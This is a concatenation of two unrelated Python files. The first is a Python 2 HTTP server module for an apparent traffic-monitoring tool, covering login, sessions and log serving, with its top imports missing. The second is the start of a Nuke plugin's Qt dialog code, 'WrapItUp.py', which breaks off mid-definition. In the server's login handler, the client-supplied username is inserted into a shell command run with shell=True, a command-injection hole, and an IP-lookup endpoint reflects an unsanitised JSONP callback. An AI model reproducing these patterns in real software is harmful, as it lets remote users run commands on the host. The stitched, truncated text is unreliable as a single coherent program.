from core.addr import int_to_addr
from core.addr import make_mask
from core.attribdict import AttribDict
from core.common import get_regex
from core.common import ipcat_lookup
from core.common import worst_asns
from core.enums import HTTP_HEADER
from core.settings import config
from core.settings import CONTENT_EXTENSIONS_EXCLUSIONS
from core.settings import DATE_FORMAT
from core.settings import DISABLED_CONTENT_EXTENSIONS
from core.settings import DISPOSED_NONCES
from core.settings import HTML_DIR
from core.settings import HTTP_TIME_FORMAT
from core.settings import MAX_NOFILE
from core.settings import NAME
from core.settings import PING_RESPONSE
from core.settings import SERVER_HEADER
from core.settings import SESSION_COOKIE_NAME
from core.settings import SESSION_COOKIE_FLAG_SAMESITE
from core.settings import SESSION_EXPIRATION_HOURS
from core.settings import SESSION_ID_LENGTH
from core.settings import SESSIONS
from core.settings import UNAUTHORIZED_SLEEP_TIME
from core.settings import VERSION
try:
# Reference: https://bugs.python.org/issue7980
# Reference: http://code-trick.com/python-bug-attribute-error-_strptime/
import _strptime
except ImportError:
pass
try:
import resource
resource.setrlimit(resource.RLIMIT_NOFILE, (MAX_NOFILE, MAX_NOFILE))
except:
pass
def start_httpd(address=None, port=None, join=False, pem=None):
"""
Starts HTTP server
"""
class ThreadingServer(SocketServer.ThreadingMixIn, BaseHTTPServer.HTTPServer):
def server_bind(self):
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
BaseHTTPServer.HTTPServer.server_bind(self)
def finish_request(self, *args, **kwargs):
try:
BaseHTTPServer.HTTPServer.finish_request(self, *args, **kwargs)
except:
if config.SHOW_DEBUG:
traceback.print_exc()
class SSLThreadingServer(ThreadingServer):
def __init__(self, server_address, pem, HandlerClass):
import OpenSSL # python-openssl
ThreadingServer.__init__(self, server_address, HandlerClass)
ctx = OpenSSL.SSL.Context(OpenSSL.SSL.TLSv1_2_METHOD)
ctx.use_privatekey_file(pem)
ctx.use_certificate_file(pem)
self.socket = OpenSSL.SSL.Connection(ctx, socket.socket(self.address_family, self.socket_type))
self.server_bind()
self.server_activate()
def shutdown_request(self, request):
try:
request.shutdown()
except:
if config.SHOW_DEBUG:
traceback.print_exc()
class ReqHandler(BaseHTTPServer.BaseHTTPRequestHandler):
def do_GET(self):
path, query = self.path.split('?', 1) if '?' in self.path else (self.path, "")
params = {}
content = None
skip = False
if hasattr(self, "data"):
params.update(urlparse.parse_qs(self.data))
if query:
params.update(urlparse.parse_qs(query))
for key in params:
if params[key]:
params[key] = params[key][-1]
if path == '/':
path = "index.html"
path = path.strip('/')
extension = os.path.splitext(path)[-1].lower()
if hasattr(self, "_%s" % path):
content = getattr(self, "_%s" % path)(params)
else:
path = path.replace('/', os.path.sep)
path = os.path.abspath(os.path.join(HTML_DIR, path)).strip()
if not os.path.isfile(path) and os.path.isfile("%s.html" % path):
path = "%s.html" % path
if any((config.IP_ALIASES,)) and self.path.split('?')[0] == "/js/main.js":
content = open(path, "rb").read()
content = re.sub(r"\bvar IP_ALIASES =.+", "var IP_ALIASES = {%s};" % ", ".join('"%s": "%s"' % (_.split(':', 1)[0].strip(), _.split(':', 1)[-1].strip()) for _ in config.IP_ALIASES), content)
self.send_response(httplib.OK)
elif ".." not in os.path.relpath(path, HTML_DIR) and os.path.isfile(path) and (extension not in DISABLED_CONTENT_EXTENSIONS or os.path.split(path)[-1] in CONTENT_EXTENSIONS_EXCLUSIONS):
mtime = time.gmtime(os.path.getmtime(path))
if_modified_since = self.headers.get(HTTP_HEADER.IF_MODIFIED_SINCE)
if if_modified_since and extension not in (".htm", ".html"):
if_modified_since = [_ for _ in if_modified_since.split(';') if _.upper().endswith("GMT")][0]
if time.mktime(mtime) <= time.mktime(time.strptime(if_modified_since, HTTP_TIME_FORMAT)):
self.send_response(httplib.NOT_MODIFIED)
self.send_header(HTTP_HEADER.CONNECTION, "close")
skip = True
if not skip:
content = open(path, "rb").read()
last_modified = time.strftime(HTTP_TIME_FORMAT, mtime)
self.send_response(httplib.OK)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, mimetypes.guess_type(path)[0] or "application/octet-stream")
self.send_header(HTTP_HEADER.LAST_MODIFIED, last_modified)
# For CSP policy directives see: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/
self.send_header(HTTP_HEADER.CONTENT_SECURITY_POLICY, "default-src 'self'; style-src 'self' 'unsafe-inline'; " +
"script-src 'self' 'unsafe-eval' https://stat.ripe.net; " +
"frame-src *; object-src 'none'; block-all-mixed-content;")
if extension not in (".htm", ".html"):
self.send_header(HTTP_HEADER.EXPIRES, "Sun, 17-Jan-2038 19:14:07 GMT") # Reference: http://blog.httpwatch.com/2007/12/10/two-simple-rules-for-http-caching/
self.send_header(HTTP_HEADER.CACHE_CONTROL, "max-age=3600, must-revalidate") # Reference: http://stackoverflow.com/a/5084555
else:
self.send_header(HTTP_HEADER.CACHE_CONTROL, "no-cache")
else:
self.send_response(httplib.NOT_FOUND)
self.send_header(HTTP_HEADER.CONNECTION, "close")
content = '<!DOCTYPE html><html lang="en"><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL %s was not found on this server.</p></body></html>' % self.path.split('?')[0]
if content is not None:
for match in re.finditer(r"<\!(\w+)\!>", content):
name = match.group(1)
_ = getattr(self, "_%s" % name.lower(), None)
if _:
content = self._format(content, **{ name: _() })
if "gzip" in self.headers.getheader(HTTP_HEADER.ACCEPT_ENCODING, ""):
self.send_header(HTTP_HEADER.CONTENT_ENCODING, "gzip")
_ = cStringIO.StringIO()
compress = gzip.GzipFile("", "w+b", 9, _)
compress._stream = _
compress.write(content)
compress.flush()
compress.close()
content = compress._stream.getvalue()
self.send_header(HTTP_HEADER.CONTENT_LENGTH, str(len(content)))
self.end_headers()
if content:
self.wfile.write(content)
self.wfile.flush()
self.wfile.close()
def do_POST(self):
length = self.headers.getheader(HTTP_HEADER.CONTENT_LENGTH)
data = self.rfile.read(int(length))
data = urllib.unquote_plus(data)
self.data = data
self.do_GET()
def get_session(self):
retval = None
cookie = self.headers.get(HTTP_HEADER.COOKIE)
if cookie:
match = re.search(r"%s\s*=\s*([^;]+)" % SESSION_COOKIE_NAME, cookie)
if match:
session = match.group(1)
if session in SESSIONS:
if SESSIONS[session].client_ip != self.client_address[0]:
pass
elif SESSIONS[session].expiration > time.time():
retval = SESSIONS[session]
else:
del SESSIONS[session]
if retval is None and not config.USERS:
retval = AttribDict({"username": "?"})
return retval
def delete_session(self):
cookie = self.headers.get(HTTP_HEADER.COOKIE)
if cookie:
match = re.search(r"%s=(.+)" % SESSION_COOKIE_NAME, cookie)
if match:
session = match.group(1)
if session in SESSIONS:
del SESSIONS[session]
def version_string(self):
return SERVER_HEADER
def end_headers(self):
if not hasattr(self, "_headers_ended"):
BaseHTTPServer.BaseHTTPRequestHandler.end_headers(self)
self._headers_ended = True
def log_message(self, format, *args):
return
def finish(self):
try:
BaseHTTPServer.BaseHTTPRequestHandler.finish(self)
except:
if config.SHOW_DEBUG:
traceback.print_exc()
def _version(self):
return VERSION
def _format(self, content, **params):
if content:
for key, value in params.items():
content = content.replace("<!%s!>" % key, value)
return content
def _login(self, params):
valid = False
if params.get("username") and params.get("hash") and params.get("nonce"):
if params.get("nonce") not in DISPOSED_NONCES:
DISPOSED_NONCES.add(params.get("nonce"))
for entry in (config.USERS or []):
entry = re.sub(r"\s", "", entry)
username, stored_hash, uid, netfilter = entry.split(':')
if username == params.get("username"):
try:
if params.get("hash") == hashlib.sha256(stored_hash.strip() + params.get("nonce")).hexdigest():
valid = True
break
except:
if config.SHOW_DEBUG:
traceback.print_exc()
if valid:
session_id = os.urandom(SESSION_ID_LENGTH).encode("hex")
expiration = time.time() + 3600 * SESSION_EXPIRATION_HOURS
self.send_response(httplib.OK)
self.send_header(HTTP_HEADER.CONNECTION, "close")
cookie = "%s=%s; expires=%s; path=/; HttpOnly" % (SESSION_COOKIE_NAME, session_id, time.strftime(HTTP_TIME_FORMAT, time.gmtime(expiration)))
if config.USE_SSL:
cookie += "; Secure"
if SESSION_COOKIE_FLAG_SAMESITE:
cookie += "; SameSite=strict"
self.send_header(HTTP_HEADER.SET_COOKIE, cookie)
if netfilter in ("", '*', "::", "0.0.0.0/0"):
netfilters = None
else:
addresses = set()
netmasks = set()
for item in set(re.split(r"[;,]", netfilter)):
item = item.strip()
if '/' in item:
_ = item.split('/')[-1]
if _.isdigit() and int(_) >= 16:
lower = addr_to_int(item.split('/')[0])
mask = make_mask(int(_))
upper = lower | (0xffffffff ^ mask)
while lower <= upper:
addresses.add(int_to_addr(lower))
lower += 1
else:
netmasks.add(item)
elif '-' in item:
_ = item.split('-')
lower, upper = addr_to_int(_[0]), addr_to_int(_[1])
while lower <= upper:
addresses.add(int_to_addr(lower))
lower += 1
elif re.search(r"\d+\.\d+\.\d+\.\d+", item):
addresses.add(item)
netfilters = netmasks
if addresses:
netfilters.add(get_regex(addresses))
SESSIONS[session_id] = AttribDict({"username": username, "uid": uid, "netfilters": netfilters, "expiration": expiration, "client_ip": self.client_address[0]})
else:
time.sleep(UNAUTHORIZED_SLEEP_TIME)
self.send_response(httplib.UNAUTHORIZED)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")
content = "Login %s" % ("success" if valid else "failed")
if not subprocess.mswindows:
try:
subprocess.check_output("logger -p auth.info -t \"%s[%d]\" \"%s password for %s from %s port %s\"" % (NAME.lower(), os.getpid(), "Accepted" if valid else "Failed", params.get("username"), self.client_address[0], self.client_address[1]), stderr=subprocess.STDOUT, shell=True)
except Exception:
if config.SHOW_DEBUG:
traceback.print_exc()
return content
def _logout(self, params):
self.delete_session()
self.send_response(httplib.FOUND)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.LOCATION, "/")
def _whoami(self, params):
session = self.get_session()
username = session.username if session else ""
self.send_response(httplib.OK)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")
return username
def _check_ip(self, params):
session = self.get_session()
if session is None:
self.send_response(httplib.UNAUTHORIZED)
self.send_header(HTTP_HEADER.CONNECTION, "close")
return None
self.send_response(httplib.OK)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")
try:
result_worst = worst_asns(params.get("address"))
if result_worst:
result_ipcat = result_worst
else:
_ = (ipcat_lookup(params.get("address")) or "").lower().split(' ')
result_ipcat = _[1] if _[0] == 'the' else _[0]
return ("%s" if not params.get("callback") else "%s(%%s)" % params.get("callback")) % json.dumps({"ipcat": result_ipcat, "worst_asns": str(result_worst is not None).lower()})
except:
if config.SHOW_DEBUG:
traceback.print_exc()
def _trails(self, params):
self.send_response(httplib.OK)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")
return open(config.TRAILS_FILE, "rb").read()
def _ping(self, params):
self.send_response(httplib.OK)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")
return PING_RESPONSE
def _events(self, params):
session = self.get_session()
if session is None:
self.send_response(httplib.UNAUTHORIZED)
self.send_header(HTTP_HEADER.CONNECTION, "close")
return None
start, end, size, total = None, None, -1, None
content = None
log_exists = False
dates = params.get("date", "")
if ".." in dates:
pass
elif '_' not in dates:
try:
date = datetime.datetime.strptime(dates, "%Y-%m-%d").strftime("%Y-%m-%d")
event_log_path = os.path.join(config.LOG_DIR, "%s.log" % date)
if os.path.exists(event_log_path):
range_handle = open(event_log_path, "rb")
log_exists = True
except ValueError:
print "[!] invalid date format in request"
log_exists = False
else:
logs_data = ""
date_interval = dates.split("_", 1)
try:
start_date = datetime.datetime.strptime(date_interval[0], "%Y-%m-%d").date()
end_date = datetime.datetime.strptime(date_interval[1], "%Y-%m-%d").date()
for i in xrange(int((end_date - start_date).days) + 1):
date = start_date + datetime.timedelta(i)
event_log_path = os.path.join(config.LOG_DIR, "%s.log" % date.strftime("%Y-%m-%d"))
if os.path.exists(event_log_path):
log_handle = open(event_log_path, "rb")
logs_data += log_handle.read()
log_handle.close()
range_handle = io.BytesIO(logs_data)
log_exists = True
except ValueError:
print "[!] invalid date format in request"
log_exists = False
if log_exists:
range_handle.seek(0, 2)
total = range_handle.tell()
range_handle.seek(0)
if self.headers.get(HTTP_HEADER.RANGE):
match = re.search(r"bytes=(\d+)-(\d+)", self.headers[HTTP_HEADER.RANGE])
if match:
start, end = int(match.group(1)), int(match.group(2))
max_size = end - start + 1
end = min(total - 1, end)
size = end - start + 1
if start == 0 or not session.range_handle:
session.range_handle = range_handle
if session.netfilters is None:
session.range_handle.seek(start)
self.send_response(httplib.PARTIAL_CONTENT)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")
self.send_header(HTTP_HEADER.CONTENT_RANGE, "bytes %d-%d/%d" % (start, end, total))
content = session.range_handle.read(size)
else:
self.send_response(httplib.OK)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")
buffer, addresses, netmasks, regex = cStringIO.StringIO(), set(), [], ""
for netfilter in session.netfilters:
if not netfilter:
continue
if '/' in netfilter:
netmasks.append(netfilter)
elif re.search(r"\A[\d.]+\Z", netfilter):
addresses.add(netfilter)
elif '\.' in netfilter:
regex = r"\b(%s)\b" % netfilter
else:
print "[!] invalid network filter '%s'" % netfilter
return
for line in session.range_handle:
display = False
ip = None
if regex:
match = re.search(regex, line)
if match:
ip = match.group(1)
display = True
if not display and (addresses or netmasks):
for match in re.finditer(r"\b(\d+\.\d+\.\d+\.\d+)\b", line):
if not display:
ip = match.group(1)
else:
break
if ip in addresses:
display = True
break
elif netmasks:
for _ in netmasks:
prefix, mask = _.split('/')
if addr_to_int(ip) & make_mask(int(mask)) == addr_to_int(prefix):
addresses.add(ip)
display = True
break
if display:
if ",%s" % ip in line or "%s," % ip in line:
line = re.sub(r" ([\d.,]+,)?%s(,[\d.,]+)? " % re.escape(ip), " %s " % ip, line)
buffer.write(line)
if buffer.tell() >= max_size:
break
content = buffer.getvalue()
end = start + len(content) - 1
self.send_header(HTTP_HEADER.CONTENT_RANGE, "bytes %d-%d/%d" % (start, end, end + 1 + max_size * (len(content) >= max_size)))
if len(content) < max_size:
session.range_handle.close()
session.range_handle = None
if size == -1:
self.send_response(httplib.OK)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")
self.end_headers()
with range_handle as f:
while True:
data = f.read(io.DEFAULT_BUFFER_SIZE)
if not data:
break
else:
self.wfile.write(data)
else:
self.send_response(httplib.OK) # instead of httplib.NO_CONTENT (compatibility reasons)
self.send_header(HTTP_HEADER.CONNECTION, "close")
if self.headers.get(HTTP_HEADER.RANGE):
self.send_header(HTTP_HEADER.CONTENT_RANGE, "bytes 0-0/0")
return content
def _counts(self, params):
counts = {}
session = self.get_session()
if session is None:
self.send_response(httplib.UNAUTHORIZED)
self.send_header(HTTP_HEADER.CONNECTION, "close")
return None
self.send_response(httplib.OK)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, "application/json")
match = re.search(r"\d+\-\d+\-\d+", params.get("from", ""))
if match:
min_ = datetime.datetime.strptime(match.group(0), DATE_FORMAT)
else:
min_ = datetime.datetime.fromtimestamp(0)
match = re.search(r"\d+\-\d+\-\d+", params.get("to", ""))
if match:
max_ = datetime.datetime.strptime(match.group(0), DATE_FORMAT)
else:
max_ = datetime.datetime.now()
min_ = min_.replace(hour=0, minute=0, second=0, microsecond=0)
max_ = max_.replace(hour=23, minute=59, second=59, microsecond=999999)
for filepath in sorted(glob.glob(os.path.join(config.LOG_DIR, "*.log"))):
filename = os.path.basename(filepath)
if not re.search(r"\A\d{4}-\d{2}-\d{2}\.log\Z", filename):
continue
try:
current = datetime.datetime.strptime(os.path.splitext(filename)[0], DATE_FORMAT)
except:
if config.SHOW_DEBUG:
traceback.print_exc()
else:
if min_ <= current <= max_:
timestamp = int(time.mktime(current.timetuple()))
size = os.path.getsize(filepath)
with open(filepath, "rb") as f:
content = f.read(io.DEFAULT_BUFFER_SIZE)
if size >= io.DEFAULT_BUFFER_SIZE:
total = 1.0 * content.count('\n') * size / io.DEFAULT_BUFFER_SIZE
counts[timestamp] = int(round(total / 100) * 100)
else:
counts[timestamp] = content.count('\n')
return json.dumps(counts)
class SSLReqHandler(ReqHandler):
def setup(self):
self.connection = self.request
self.rfile = socket._fileobject(self.request, "rb", self.rbufsize)
self.wfile = socket._fileobject(self.request, "wb", self.wbufsize)
# IPv6 support
if ':' in (address or ""):
address = address.strip("[]")
BaseHTTPServer.HTTPServer.address_family = socket.AF_INET6
# Reference: https://github.com/squeaky-pl/zenchmarks/blob/master/vendor/twisted/internet/tcp.py
_AI_NUMERICSERV = getattr(socket, "AI_NUMERICSERV", 0)
_NUMERIC_ONLY = socket.AI_NUMERICHOST | _AI_NUMERICSERV
_address = socket.getaddrinfo(address, int(port) if str(port or "").isdigit() else 0, 0, 0, 0, _NUMERIC_ONLY)[0][4]
else:
_address = (address or '', int(port) if str(port or "").isdigit() else 0)
try:
if pem:
server = SSLThreadingServer(_address, pem, SSLReqHandler)
else:
server = ThreadingServer(_address, ReqHandler)
except Exception as ex:
if "Address already in use" in str(ex):
exit("[!] another instance already running")
elif "Name or service not known" in str(ex):
exit("[!] invalid configuration value for 'HTTP_ADDRESS' ('%s')" % config.HTTP_ADDRESS)
elif "Cannot assign requested address" in str(ex):
exit("[!] can't use configuration value for 'HTTP_ADDRESS' ('%s')" % config.HTTP_ADDRESS)
else:
raise
print "[i] starting HTTP%s server at 'http%s://%s:%d/'" % ('S' if pem else "", 's' if pem else "", server.server_address[0], server.server_address[1])
print "[o] running..."
if join:
server.serve_forever()
else:
thread = threading.Thread(target=server.serve_forever)
thread.daemon = True
thread.start()
|
WrapItUp.py
|
# Max van Leeuwen - maxvanleeuwen.com/WrapItUp
# WrapItUp - 1.9
#
# Collect all media, gizmos and files associated with a nuke script, and copy it all to a separate folder - along with a relinked duplicate of the nuke script.
WIU_Title = 'WrapItUp 1.9 - maxvanleeuwen.com'
WIU_Log = '[WrapItUp] '
# import PySide(2)
try:
# try importing PySide2
try:
import PySide2.QtCore as QtCore
import PySide2.QtGui as QtGui
import PySide2.QtWidgets as QtWidgets
# on error, try PySide (with QtGui imported as QtWidgets)
except Exception as e:
import PySide.QtCore as QtCore
import PySide.QtGui as QtGui
import PySide.QtGui as QtWidgets
# ignore if in python shell
except Exception as e:
pass
# EMBEDDED UI
class Ui_Dialog(object):
def setupUi(self, Dialog):
Dialog.setObjectName("Dialog")
Dialog.setWindowModality(QtCore.Qt.ApplicationModal)
Dialog.setEnabled(True)
Dialog.resize(897, 868)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(Dialog.sizePolicy().hasHeightForWidth())
Dialog.setSizePolicy(sizePolicy)
Dialog.setFocusPolicy(QtCore.Qt.StrongFocus)
Dialog.setWindowOpacity(1.0)
Dialog.setAutoFillBackground(False)
Dialog.setWindowFilePath("")
Dialog.setSizeGripEnabled(False)
Dialog.setModal(False)
self.ListCopyPaths = QtWidgets.QListWidget(Dialog)
self.ListCopyPaths.setGeometry(QtCore.QRect(20, 240, 421, 411))
self.ListCopyPaths.setAutoFillBackground(False)
self.ListCopyPaths.setVerticalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOn)
self.ListCopyPaths.setHorizontalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOn)
self.ListCopyPaths.setSelectionMode(QtWidgets.QAbstractItemView.ExtendedSelection)
self.ListCopyPaths.setVerticalScrollMode(QtWidgets.QAbstractItemView.ScrollPerPixel)
self.ListCopyPaths.setHorizontalScrollMode(QtWidgets.QAbstractItemView.ScrollPerPixel)
self.ListCopyPaths.setResizeMode(QtWidgets.QListView.Fixed)
self.ListCopyPaths.setObjectName("ListCopyPaths")
self.ListIgnorePaths = QtWidgets.QListWidget(Dialog)
self.ListIgnorePaths.setGeometry(QtCore.QRect(460, 240, 421, 411))
self.ListIgnorePaths.setVerticalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOn)
self.ListIgnorePaths.setHorizontalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOn)
self.ListIgnorePaths.setSelectionMode(QtWidgets.QAbstractItemView.ExtendedSelection)
self.ListIgnorePaths.setVerticalScrollMode(QtWidgets.QAbstractItemView.ScrollPerPixel)
self.ListIgnorePaths.setHorizontalScrollMode(QtWidgets.QAbstractItemView.ScrollPerPixel)
self.ListIgnorePaths.setObjectName("ListIgnorePaths")
self.SendToIgnore = QtWidgets.QPushButton(Dialog)
self.SendToIgnore.setGeometry(QtCore.QRect(290, 660, 151, 23))
self.SendToIgnore.setAutoDefault(False)
self.SendToIgnore.setObjectName("SendToIgnore")
self.SendToCopy = QtWidgets.QPushButton(Dialog)
self.SendToCopy.setGeometry(QtCore.QRect(460, 660, 151, 23))
self.SendToCopy.setAutoDefault(False)
self.SendToCopy.setObjectName("SendToCopy")
self.PackedPath = QtWidgets.QLineEdit(Dialog)
self.PackedPath.setGeometry(QtCore.QRect(20, 40, 781, 20))
self.PackedPath.setText("")
self.PackedPath.setObjectName("PackedPath")
self.ChoosePackedPathButton = QtWidgets.QPushButton(Dialog)
self.ChoosePackedPathButton.setGeometry(QtCore.QRect(810, 39, 75, 23))
self.ChoosePackedPathButton.setAutoDefault(False)
self.ChoosePackedPathButton.setObjectName("ChoosePackedPathButton")
self.LCopy = QtWidgets.QLabel(Dialog)
self.LCopy.setGeometry(QtCore.QRect(30, 220, 47, 13))
self.LCopy.setObjectName("LCopy")
self.LIgnore = QtWidgets.QLabel(Dialog)
self.LIgnore.setGeometry(QtCore.QRect(470, 220, 47, 13))
self.LIgnore.setObjectName("LIgnore")
self.LCurrItemItemPath = QtWidgets.QLabel(Dialog)
self.LCurrItemItemPath.setGeometry(QtCore.QRect(20, 720, 131, 16))
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.LCurrItemItemPath.setFont(font)
self.LCurrItemItemPath.setObjectName("LCurrItemItemPath")
self.LPackedItemPath = QtWidgets.QLabel(Dialog)
self.LPackedItemPath.setGeometry(QtCore.QRect(20, 740, 131, 16))
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.LPackedItemPath.setFont(font)
self.LPackedItemPath.setObjectName("LPackedItemPath")
self.CurrItemPath = QtWidgets.QLabel(Dialog)
self.CurrItemPath.setGeometry(QtCore.QRect(150, 720, 771, 16))
self.CurrItemPath.setTextInteractionFlags(QtCore.Qt.LinksAccessibleByMouse)
self.CurrItemPath.setObjectName("CurrItemPath")
self.PackedItemPath = QtWidgets.QLabel(Dialog)
self.PackedItemPath.setGeometry(QtCore.QRect(150, 740, 771, 16))
self.PackedItemPath.setTextInteractionFlags(QtCore.Qt.LinksAccessibleByMouse)
self.PackedItemPath.setObjectName("PackedItemPath")
self.LWebsite = QtWidgets.QLabel(Dialog)
self.LWebsite.setGeometry(QtCore.QRect(20, 830, 221, 16))
self.LWebsite.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))
self.LWebsite.setOpenExternalLinks(True)
self.LWebsite.setObjectName("LWebsite")
self.LPath = QtWidgets.QLabel(Dialog)
self.LPath.setGeometry(QtCore.QRect(20, 20, 781, 16))
self.LPath.setObjectName("LPath")
self.LFiles = QtWidgets.QLabel(Dialog)
self.LFiles.setGeometry(QtCore.QRect(20, 760, 131, 16))
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.LFiles.setFont(font)
self.LFiles.setObjectName("LFiles")
self.CurrItemFiles = QtWidgets.QLabel(Dialog)
self.CurrItemFiles.setGeometry(QtCore.QRect(150, 760, 771, 16))
self.CurrItemFiles.setObjectName("CurrItemFiles")
self.TotalProgress = QtWidgets.QProgressBar(Dialog)
self.TotalProgress.setEnabled(True)
self.TotalProgress.setGeometry(QtCore.QRect(370, 830, 161, 23))
self.TotalProgress.setProperty("value", 0)
self.TotalProgress.setTextVisible(True)
self.TotalProgress.setOrientation(QtCore.Qt.Horizontal)
self.TotalProgress.setInvertedAppearance(False)
self.TotalProgress.setTextDirection(QtWidgets.QProgressBar.TopToBottom)
self.TotalProgress.setObjectName("TotalProgress")
self.Refresh = QtWidgets.QPushButton(Dialog)
self.Refresh.setGeometry(QtCore.QRect(800, 660, 75, 23))
self.Refresh.setAutoDefault(False)
self.Refresh.setObjectName("Refresh")
self.Start = QtWidgets.QPushButton(Dialog)
self.Start.setGeometry(QtCore.QRect(710, 830, 75, 23))
self.Start.setAutoDefault(False)
self.Start.setObjectName("Start")
self.Interrupt = QtWidgets.QPushButton(Dialog)
self.Interrupt.setGeometry(QtCore.QRect(800, 830, 75, 23))
self.Interrupt.setAutoDefault(False)
self.Interrupt.setObjectName("Interrupt")
self.LSize = QtWidgets.QLabel(Dialog)
self.LSize.setGeometry(QtCore.QRect(20, 780, 131, 16))
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.LSize.setFont(font)
self.LSize.setObjectName("LSize")
self.CurrItemSize = QtWidgets.QLabel(Dialog)
self.CurrItemSize.setGeometry(QtCore.QRect(150, 780, 771, 16))
self.CurrItemSize.setObjectName("CurrItemSize")
self.LTotalCopySize = QtWidgets.QLabel(Dialog)
self.LTotalCopySize.setGeometry(QtCore.QRect(560, 830, 71, 21))
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.LTotalCopySize.setFont(font)
self.LTotalCopySize.setObjectName("LTotalCopySize")
self.TotalCopySize = QtWidgets.QLabel(Dialog)
self.TotalCopySize.setGeometry(QtCore.QRect(640, 830, 71, 21))
self.TotalCopySize.setObjectName("TotalCopySize")
self.IgnoredLabel = QtWidgets.QLabel(Dialog)
self.IgnoredLabel.setGeometry(QtCore.QRect(20, 700, 131, 16))
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.IgnoredLabel.setFont(font)
self.IgnoredLabel.setToolTip("")
self.IgnoredLabel.setObjectName("IgnoredLabel")
self.CurrentCopyItem = QtWidgets.QLabel(Dialog)
self.CurrentCopyItem.setGeometry(QtCore.QRect(370, 800, 161, 21))
self.CurrentCopyItem.setTextInteractionFlags(QtCore.Qt.LinksAccessibleByMouse|QtCore.Qt.TextSelectableByMouse)
self.CurrentCopyItem.setObjectName("CurrentCopyItem")
self.GoToFolder = QtWidgets.QPushButton(Dialog)
self.GoToFolder.setEnabled(False)
self.GoToFolder.setGeometry(QtCore.QRect(20, 660, 75, 23))
self.GoToFolder.setAutoDefault(False)
self.GoToFolder.setObjectName("GoToFolder")
self.ItemProgress = QtWidgets.QProgressBar(Dialog)
self.ItemProgress.setEnabled(True)
self.ItemProgress.setGeometry(QtCore.QRect(370, 800, 161, 23))
self.ItemProgress.setProperty("value", 0)
self.ItemProgress.setTextVisible(False)
self.ItemProgress.setTextDirection(QtWidgets.QProgressBar.TopToBottom)
self.ItemProgress.setObjectName("ItemProgress")
self.SettingPages = QtWidgets.QTabWidget(Dialog)
self.SettingPages.setGeometry(QtCore.QRect(20, 90, 861, 111))
self.SettingPages.setObjectName("SettingPages")
self.MainSettings = QtWidgets.QWidget()
self.MainSettings.setObjectName("MainSettings")
self.RelinkPaths = QtWidgets.QCheckBox(self.MainSettings)
self.RelinkPaths.setGeometry(QtCore.QRect(20, 20, 271, 17))
self.RelinkPaths.setCheckable(True)
self.RelinkPaths.setChecked(True)
self.RelinkPaths.setObjectName("RelinkPaths")
self.RelativeRelink = QtWidgets.QCheckBox(self.MainSettings)
self.RelativeRelink.setEnabled(True)
self.RelativeRelink.setGeometry(QtCore.QRect(20, 40, 321, 17))
self.RelativeRelink.setChecked(True)
self.RelativeRelink.setObjectName("RelativeRelink")
self.LParentDirectories = QtWidgets.QLabel(self.MainSettings)
self.LParentDirectories.setGeometry(QtCore.QRect(510, 40, 191, 21))
self.LParentDirectories.setObjectName("LParentDirectories")
self.ParentDirectories = QtWidgets.QSpinBox(self.MainSettings)
self.ParentDirectories.setGeometry(QtCore.QRect(460, 40, 41, 21))
self.ParentDirectories.setSuffix("")
self.ParentDirectories.setPrefix("")
self.ParentDirectories.setMinimum(1)
self.ParentDirectories.setMaximum(99)
self.ParentDirectories.setProperty("value", 3)
self.ParentDirectories.setObjectName("ParentDirectories")
self.NodeNameFolder = QtWidgets.QCheckBox(self.MainSettings)
self.NodeNameFolder.setGeometry(QtCore.QRect(460, 20, 271, 17))
self.NodeNameFolder.setChecked(True)
self.NodeNameFolder.setObjectName("NodeNameFolder")
self.SettingPages.addTab(self.MainSettings, "")
self.tab = QtWidgets.QWidget()
self.tab.setObjectName("tab")
self.CopyFontDir = QtWidgets.QCheckBox(self.tab)
self.CopyFontDir.setGeometry(QtCore.QRect(20, 20, 271, 17))
self.CopyFontDir.setChecked(True)
self.CopyFontDir.setObjectName("CopyFontDir")
self.CopyGizmos = QtWidgets.QCheckBox(self.tab)
self.CopyGizmos.setGeometry(QtCore.QRect(20, 40, 271, 17))
self.CopyGizmos.setChecked(True)
self.CopyGizmos.setObjectName("CopyGizmos")
self.SettingPages.addTab(self.tab, "")
self.Misc = QtWidgets.QWidget()
self.Misc.setObjectName("Misc")
self.ContinueOnError = QtWidgets.QCheckBox(self.Misc)
